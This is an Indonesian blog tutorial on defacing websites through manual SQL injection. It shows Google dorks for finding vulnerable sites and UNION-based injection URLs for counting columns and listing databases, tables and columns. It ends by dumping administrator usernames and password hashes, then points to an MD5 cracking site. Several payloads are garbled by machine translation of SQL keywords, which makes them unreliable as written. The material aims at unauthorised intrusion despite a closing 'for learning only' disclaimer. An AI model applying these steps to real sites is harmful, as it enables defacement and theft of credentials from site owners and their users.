Deface SQL Injection [ Manual ] - Alltutorcyber

Alltutorcyber

Kumpulan Berbagai TUTORIAL yang ada di Internet.

Breaking

Post Top Ad

All Tutor Cyber

Sunday, February 26, 2017

Deface SQL Injection [ Manual ]


Deface SQL Injection [ Manual ]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Tutorial Deface SQL Injection [ Manual ]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

SQL Injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya. SQL Injection digunakan untuk berkomunikasi dengan database website


Deface SQL Injection [ Manual ]

1. Menemukan SQL injection situs rentan 

Dorking :
              - inurl:? index.php id =
              - inurl:? admin.php id =
              - inurl:? pages.php id =
              - inurl:? pages.php id =


copy dan paste salah satu script di Google seperti inurl:? id = index.php


2. Pilih salah Satu Web

Contoh => www.target.com/index.php?id=1



3. Sekarang Anda harus menambahkan ( ') pada akhir URL 


contoh => www.target.com/index.php?id=1 '

jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.


4.  Sekarang kita harus mencari jumlah kolom


www.target.com/index.php?id=1 order by 10-- (ERROR)

www.target.com/index.php?id=1 order by 9-- (ERROR)

www.target.com/index.php?id=1 order by 8-- (ERROR)

www.target.com/index.php?id=1 order by 7-- (NO ERROR)


jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7


5. Sekarang kita harus menemukan kolom rentan 


serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--

jika menunjukkan angka 2 kolom maka rentan adalah 2



6.  kita harus menemukan versi database 


www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--

Mengganti kolom rentan dengan "@@ version"

jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya



7.  Sekarang menemukan nama database


serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--



ia akan menampilkan nama data base biarkan nama data base adalah "dunia"



8. Sekarang menemukan nama semua tabel 


union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -


ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel

biarkan kita menemukan nama tabel "administrator"



9. Sekarang kita harus mencari nama kolom


union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang () 

kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password

biarkan kita memiliki nama dua kolom user_name dan pass_word.



10.  Sekarang menemukan password dari user_name 


www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator


itu akan menampilkan username dan password

itu akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi

untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk


Sekianlah Postingan Dari All Tutor Cyber tentang "Deface SQL Injection [ Manual ]" Semoga Bisa Bermanfaat!.


Anda Sekarang Sedang Membaca Postingan "Cara Mengendalikan / Meretas PC Orang dari Jarak JauhDeface SQL Injection [ Manual ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/02/deface-sql-injection.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

No comments:

Post a Comment